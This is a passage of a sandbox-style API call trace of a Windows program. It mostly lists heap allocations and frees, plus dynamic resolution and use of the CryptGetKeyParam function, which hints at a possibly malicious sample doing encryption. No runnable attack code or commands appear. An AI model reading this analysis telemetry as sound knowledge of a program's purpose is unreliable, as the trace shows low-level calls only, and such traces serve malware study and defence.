Flags=0x0, Size=0x8) returned 0x43e2950 [0082.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0082.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0082.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb2a0 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0082.011] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0082.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0082.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0082.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.014] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.017] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0082.017] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2a10, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a10*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0082.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.019] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.019] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.019] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0082.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 